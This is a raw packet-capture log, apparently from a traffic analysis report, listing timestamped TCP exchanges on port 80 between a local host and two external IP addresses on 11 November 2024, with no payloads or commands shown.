                                                                                                Nov 11, 2024 10:04:35.299539089 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299547911 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299560070 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299561024 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299567938 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299586058 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299595118 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299602032 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299628019 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299643040 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299645901 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299657106 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299658060 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299669027 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299674034 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299681902 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299694061 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299705029 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299705029 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299705029 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299712896 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299717903 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299725056 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299731016 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299742937 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299771070 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299777031 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299798012 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299834013 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300091028 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300103903 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300115108 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300143957 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300160885 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300182104 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300193071 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300203085 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300215006 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300224066 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300234079 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300250053 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300354958 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300367117 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300375938 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300388098 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300400019 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300405979 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300410986 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300421000 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300426960 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300455093 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300606012 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300618887 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300627947 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300638914 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300651073 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300662041 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300667048 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300667048 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300676107 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300683975 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300687075 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300698996 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300698996 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300709963 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300720930 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300728083 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300740004 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300748110 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300751925 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300762892 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300774097 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300784111 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300791025 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300796032 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300808907 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.300812960 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300820112 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300834894 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300853968 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.300879002 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301033974 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301084042 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301084042 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301096916 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301122904 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301134109 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301208973 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301223040 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301233053 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301244020 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301264048 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301276922 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301287889 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301378965 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301389933 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301399946 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301413059 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301424980 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301430941 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301441908 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301460981 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301496029 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301511049 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301522017 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301533937 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301543951 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301557064 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301558018 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301558018 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301584959 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301589966 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301590919 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301600933 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301611900 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301624060 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301628113 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301637888 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301650047 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301651001 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301659107 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301671028 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301691055 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301717997 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301868916 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301879883 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301889896 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301901102 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301912069 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301923990 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301923990 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301934958 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301939964 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301945925 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.301951885 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301968098 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301980019 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.301990032 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302000999 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302011013 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302021980 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302027941 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.302032948 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302046061 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302046061 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.302057028 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.302071095 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.302079916 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.302095890 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.302180052 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302191973 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302203894 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302215099 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302226067 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302232981 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.302237034 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302248955 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302251101 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.302258968 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302264929 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.302270889 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302282095 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302290916 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.302294016 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302299023 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.302309990 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.302311897 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302324057 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.302355051 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.302388906 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.302622080 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302633047 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302644014 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302675009 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.302675009 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.302757978 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302773952 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302786112 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302797079 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.302804947 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.302818060 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.302829981 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.303025007 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.303035975 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.303055048 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.303066969 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.303076982 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.303077936 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.303088903 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.303100109 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.303100109 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.303117990 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.303118944 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.303129911 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.303133011 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.303142071 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.303148985 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.303158998 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.303168058 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.303170919 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.303175926 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.303181887 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.303193092 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.303198099 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.303205013 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.303215027 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.303217888 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.303225040 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.303244114 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.303250074 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.303266048 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.303277016 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.303287029 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.303289890 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.303309917 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.303323030 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.303354979 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.347157001 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347246885 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347259998 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347270966 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.347273111 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347285032 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347296000 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.347297907 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347317934 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.347326994 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.347338915 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347366095 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347379923 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.347383022 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347393990 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347404957 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.347408056 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347425938 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.347429991 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347431898 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.347441912 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347453117 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.347455025 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347466946 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347476006 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.347477913 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347484112 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.347490072 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347501040 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.347502947 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.347521067 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.347538948 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.347640038 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379270077 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379328012 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379333973 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379342079 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379357100 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379369020 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379374981 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379381895 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379400969 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379401922 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379415035 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379426956 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379437923 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379445076 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379453897 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379463911 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379468918 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379477024 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379488945 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379513025 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379514933 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379528046 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379534006 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379544020 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379556894 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379556894 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379568100 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379573107 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379580021 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379592896 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379610062 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379622936 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379626036 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379626036 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379636049 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379643917 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379647970 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379663944 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379666090 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379677057 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379682064 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379688978 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379698992 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379702091 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379713058 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.379720926 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379731894 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379755020 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.379870892 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:44.841485023 CET4916480192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:44.846468925 CET8049164208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:44.846558094 CET4916480192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:44.857294083 CET4916480192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:44.862598896 CET8049164208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:44.862759113 CET4916480192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:44.863142014 CET8049164208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:44.868014097 CET8049164208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:45.329088926 CET8049164208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:45.329193115 CET4916480192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:46.367800951 CET4916480192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:46.372739077 CET8049164208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:47.389642954 CET4916580192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:47.394397020 CET8049165208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:47.394490957 CET4916580192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:47.428039074 CET4916580192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:47.433037043 CET8049165208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:47.876447916 CET8049165208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:47.876717091 CET4916580192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:48.942078114 CET4916580192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:48.947057009 CET8049165208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:49.959084034 CET4916680192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:49.964157104 CET8049166208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:49.964276075 CET4916680192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:49.976736069 CET4916680192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:49.981601954 CET8049166208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:49.981666088 CET4916680192.168.2.22208.91.197.27
                                                                                                Nov 11, 2024 10:04:49.981673002 CET8049166208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:49.986462116 CET8049166208.91.197.27192.168.2.22
                                                                                                Nov 11, 2024 10:04:49.986535072 CET8049166208.91.197.27192.168.2.22
